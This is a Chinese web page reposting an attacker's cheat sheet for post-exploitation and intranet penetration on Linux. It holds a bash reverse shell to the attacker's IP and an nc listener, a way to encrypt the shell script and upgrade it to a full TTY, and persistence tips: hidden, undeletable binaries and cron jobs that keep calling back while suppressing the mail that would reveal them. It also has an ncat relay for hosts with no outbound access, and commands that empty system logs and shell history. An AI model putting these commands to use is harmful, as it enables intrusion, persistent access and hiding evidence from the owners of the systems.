干货-后渗透及内网初体验的总结
来源:admin
发布时间:2022-08-20 09:29:02
点击数:
隐藏ip
加密bash反弹shell
bash -i >& /dev/tcp/攻击机的ip/攻击机接收shell的端口 0>&1
nc -lvvp 攻击机接收shell的端口
//netcat版本低时l和p参数不兼容,可以nc -lvv port监听端口
./shc -Uvrf reverse.sh -o reverse
./reverse
listen port
,在后面复制一行,把port
改成自己想开放的端口,重启nginxcurl vps:port
./shfile > result.txt
result.txt
中的结果,就可以看到哪些端口能出网,nmap ---top-ports 100
和nmap ---top-ports 1000
可以查看nmap整理的100和1000个最常用的端口,可以参考一下# 攻击机本地执行# 首先检查当前终端和STTY信息$ echo $TERM$ stty -a# 查看输出的rows和columns,后面配置用
# 此时攻击机已经获取到了bash$ python -c 'import pty; pty.spawn("/bin/bash")'$ ctrl + z //快捷键
$ stty raw -echo
$ fg$ reset //这一步我实测有问题,输了会出问题,不输也没有影响,所以如果输了有问题可以不输
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows 行数 columns 列数
SayString "python -c 'import pty; pty.spawn(""/bin/bash"")'"WaitKeyWaitKeyWaitKeyWaitKeySayString "stty raw -echo"WaitKeyWaitKeySayString "fg"WaitKey WaitKey WaitKeySayString "export SHELL=bash"WaitKey WaitKeySayString "export TERM=xterm-256color"WaitKey WaitKeySayString "stty rows 45 columns 184"
reset
一下就好了screen
,类似于windows下的多窗口,接收shell的时候新开一个screen挂在后台,不用的时候就在后台挂着,用的时候切过去用就可以了screen
的简单使用教程:screen -S 这个screen会话的名字
创建一个screenscreen -r screen会话的名字
恢复一个screenexit
可以退出screen1.`screen -list`查看所有的screen会话
2.`screen -list`会显示相应对话的pid,通过`kill -9 pid`也可以关闭相应的screen会话
3.`screen -d screen会话的名字`可以将一个正在活动的screen放到后台
4.如果在screen中嵌套了screen,那么快捷键ctrl+a,ctrl+a,ctrl+d可以把第二层screen放在第一层的后台,快捷键ctrl+a,ctrl+d是不论嵌套几层screen都会把最外层的screen放在后台的
低权限提权
权限维持
chmod +x 二进制文件
给一下权限.
变为隐藏文件(ls -a
可以查看隐藏文件)chattr +i 二进制文件
(chattr -i 二进制文件
可以解除锁定)防止删除,有相应的权限才能成功执行这条命令crontab -e
添加,注意crontab -e
需要交互式shell,理论上来说非root用户的cron存在/var/spool/crond下(CentOS),可以直接编辑相应的文件,但是非root用户通常没有权限直接编辑,所以还是需要获取交互式shell然后crontab -e
添加crontab -l
或crontab -e
是看不到的crontab -e
没有,不管是怎么写cron,都建议使用以下配置:$PATH
查看环境变量并复制,然后再写cronSHELL=
+相应的shell位置,第二行配置为PATH=
+默认的(如果有的话)加上前面的$PATH
,第三行配置为MAILTO=""
,第三行的意义是计划任务的执行结果不给用户发邮件,因为计划任务反弹shell是不停的反弹,但是攻击机如果之前接收到的shell还没关端口被占用着弹shell就失败了就会报错然后发邮件,发了邮件的话每次执行命令都会提示,很容易就被发现了* * * * * root /要执行的命令或文件
* * * * * /要执行的命令或文件
内网
信息收集
搭建代理
内网渗透
内网不出网反弹shell
ncat -l 中转机器接收内网反弹来的shell的端口 -c 'ncat 攻击机的ip 攻击机的端口'
痕迹清理
echo -n > /var/log/syslogecho -n > /var/log/messagesecho -n > /var/log/httpd/access_logecho -n > /var/log/httpd/error_logecho -n > /var/log/xferlogecho -n > /var/log/secureecho -n > /var/log/auth.logecho -n > /var/log/user.logecho -n > /var/log/wtmpecho -n > /var/log/lastlogecho -n > /var/log/btmpecho -n > /var/run/utmphistory -rhistory -cecho > ~/.bash_historyHISTZISE=0
来源:乌云安全
(版权归原作者所有,侵删)